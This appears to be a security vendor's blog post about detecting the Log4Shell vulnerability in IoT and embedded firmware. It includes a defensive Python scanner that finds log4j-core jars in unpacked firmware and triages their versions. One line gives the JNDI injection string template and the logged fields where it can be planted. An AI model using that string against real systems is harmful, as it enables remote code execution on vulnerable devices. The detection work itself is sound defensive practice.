From the Finite State Vulnerability & Threat Intelligence Team: Unsure if your IoT or embedded devices are vulnerable to Log4j flaws? Let us help you ASAP – these are easily exploitable vulnerabilities that need urgent detection and remediation. Talk to us at Log4j@finitestate.io to get on the fast-track to remediating Log4j vulnerabilities in all your products.
The flaw in Log4j’s code (called Log4Shell) allows unauthenticated remote code execution: an attacker only needs to get a string of the form ${jndi:ldap://<attacker host>/...} into something the application logs (a User-Agent header, a username, a device name) and a vulnerable Log4j 2.x resolves the lookup and loads attacker-supplied code. A critical vulnerability in a logging utility used across a very large share of Java applications, Log4Shell (CVE-2021-44228) represents a potential nightmare scenario for businesses using impacted software. As news of the vulnerability spread, many businesses were relieved to discover that simple patches and mitigations applied to web applications (upgrading log4j-core, or removing the JndiLookup class from the jar) can prevent potential attackers from exploiting it.
However, this advice doesn’t apply to software embedded in the firmware of devices that can – and often do – use Log4j. On a device the vulnerable jar is baked into a firmware image: an operator cannot swap a library or set a JVM property, and must instead wait for a vendor firmware update, which in turn requires the vendor to know which products and versions ship the library at all. Embedded and connected devices in many critical industries are developed with Java, and frequently make use of embedded Java servers.
At Finite State, we knew a Log4j vulnerability would be an issue for embedded devices for a simple reason: we searched our extensive firmware libraries for it, and immediately uncovered pervasive issues in devices used across numerous industries.
Our analysis of firmware binaries for embedded and connected devices made it possible to detect Log4j with a single click and search. Because the Finite State platform analyzes the binaries directly, the process can be automated and covers every component and subcomponent in a firmware image, including a log4j-core jar bundled inside another application archive.
If you manufacture any embedded products, even detecting the presence of Log4j in each of your SKUs and firmware versions can be extremely time-consuming. When our research team discussed manual processes with major manufacturers, we found it usually takes 2-8 weeks to uncover whether a vulnerability impacts product lines. At Finite State, we can shorten that process so that it takes seconds to identify the presence of new vulnerabilities as soon as they are discovered.
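The following script is an added illustration of what that presence check looks like when done against unpacked firmware; it is not Finite State's platform code and makes no claim about how their analysis works. It assumes the firmware filesystem has already been extracted to a directory (with binwalk or similar), identifies log4j-core by its Maven metadata path and its JndiLookup class path, recurses into JARs nested inside WARs, EARs and fat JARs, and triages each hit for CVE-2021-44228 only. The sample firmware tree it scans is constructed in a temporary directory for the demonstration; the "class files" inside it are four bytes of class-file magic, not real bytecode.

```python
"""Scan an unpacked firmware tree for log4j-core and triage it for CVE-2021-44228.

Added example; constructed fixture data only, nothing here comes from a real device.
"""
import io
import re
import tempfile
import zipfile
from pathlib import Path

# Entry names that identify a log4j-core JAR and carry its version.
JNDI_LOOKUP = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
ARCHIVE_SUFFIXES = (".jar", ".war", ".ear", ".zip")
# log4j-core 2.x below 2.15.0 is affected by CVE-2021-44228, except the
# backported fix releases 2.12.2 (Java 7) and 2.3.1 (Java 6).
FIXED_BACKPORTS = {(2, 3, 1), (2, 12, 2)}


def parse_version(text):
    """'2.14.1' -> (2, 14, 1); '2.0-beta9' -> (2, 0, 0); None if unparseable."""
    m = re.match(r"\s*(\d+)\.(\d+)(?:\.(\d+))?", text)
    if not m:
        return None
    return (int(m.group(1)), int(m.group(2)), int(m.group(3) or 0))


def verdict(version, has_jndi_lookup):
    """Triage one log4j-core occurrence for CVE-2021-44228 (later CVEs not covered)."""
    if not has_jndi_lookup:
        return "JndiLookup.class absent: not exploitable via CVE-2021-44228"
    if version is None:
        return "log4j-core present, version unknown: inspect manually"
    if version >= (2, 15, 0) or version in FIXED_BACKPORTS:
        return "patched for CVE-2021-44228"
    return "VULNERABLE to CVE-2021-44228"


def inspect_archive(zf, location, findings):
    """Record log4j-core inside one ZIP, then recurse into archives nested in it."""
    names = set(zf.namelist())
    if JNDI_LOOKUP in names or POM_PROPS in names:
        version = None
        if POM_PROPS in names:
            props = zf.read(POM_PROPS).decode("utf-8", "replace")
            m = re.search(r"^version=(.+)$", props, re.MULTILINE)
            if m:
                version = parse_version(m.group(1))
        has_jndi = JNDI_LOOKUP in names
        findings.append({"location": location, "version": version,
                         "jndi_lookup": has_jndi,
                         "verdict": verdict(version, has_jndi)})
    for name in sorted(names):
        if name.lower().endswith(ARCHIVE_SUFFIXES):
            try:
                with zipfile.ZipFile(io.BytesIO(zf.read(name))) as inner:
                    inspect_archive(inner, f"{location}!/{name}", findings)
            except zipfile.BadZipFile:
                continue  # named like an archive but is not one


def scan_tree(root):
    """Walk an extracted firmware filesystem and return every log4j-core finding."""
    root = Path(root)
    findings = []
    for path in sorted(root.rglob("*")):
        if path.is_file() and path.suffix.lower() in ARCHIVE_SUFFIXES:
            try:
                with zipfile.ZipFile(path) as zf:
                    inspect_archive(zf, path.relative_to(root).as_posix(), findings)
            except zipfile.BadZipFile:
                continue
    return findings


def make_log4j_core_jar(version, include_lookup=True):
    """Constructed stand-in for log4j-core-<version>.jar: Maven metadata plus a dummy class."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(POM_PROPS, f"version={version}\ngroupId=org.apache.logging.log4j\n")
        if include_lookup:
            zf.writestr(JNDI_LOOKUP, b"\xca\xfe\xba\xbe")  # class-file magic only, no bytecode
    return buf.getvalue()


def demo():
    """Build a constructed firmware tree in a temp dir, scan it, return findings keyed by location."""
    root = Path(tempfile.mkdtemp(prefix="fw-"))
    # (1) vulnerable 2.14.1 two levels down, inside the management UI's WAR
    war = io.BytesIO()
    with zipfile.ZipFile(war, "w") as zf:
        zf.writestr("WEB-INF/lib/log4j-core-2.14.1.jar", make_log4j_core_jar("2.14.1"))
    (root / "opt/app").mkdir(parents=True)
    (root / "opt/app/portal.war").write_bytes(war.getvalue())
    # (2) a patched release and (3) 2.14.1 with JndiLookup.class stripped out
    (root / "usr/lib/java").mkdir(parents=True)
    (root / "usr/lib/java/log4j-core-2.17.1.jar").write_bytes(make_log4j_core_jar("2.17.1"))
    (root / "usr/lib/java/log4j-core-2.14.1.jar").write_bytes(
        make_log4j_core_jar("2.14.1", include_lookup=False))
    return {f["location"]: f for f in scan_tree(root)}


if __name__ == "__main__":
    for location, f in demo().items():
        print(f"{location}: version={f['version']} -> {f['verdict']}")
```

Two caveats matter in practice. First, the scan only sees what is in ZIP-format containers on a filesystem you have already unpacked; squashfs, JFFS2 and vendor-specific image formats have to be extracted first, and a log4j-core whose package has been relocated by a shading plugin, or whose pom.properties was dropped at build time, surfaces only as "version unknown" or not at all. Second, the version string alone is not the whole story: a 2.14.1 jar with JndiLookup.class removed is not exploitable through CVE-2021-44228, while a 2.15.0 jar is still exposed to the follow-up CVEs, so a triage rule has to look at both the version and the class list, as above, and be kept current as new advisories appear.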
Those weeks translate to a massive head start for attackers, and we know that many companies want to know now whether this vulnerability is impacting their devices (and if so, which ones). Manufacturers of devices used in healthcare or critical infrastructure – we hear your urgent needs and we are ready to help.
If you want to determine whether your products may contain Log4j, our teams can evaluate your binaries quickly and give you an answer fast. Contact Log4j@finitestate.io and let us know what products you’d like to evaluate and we can get you started ASAP.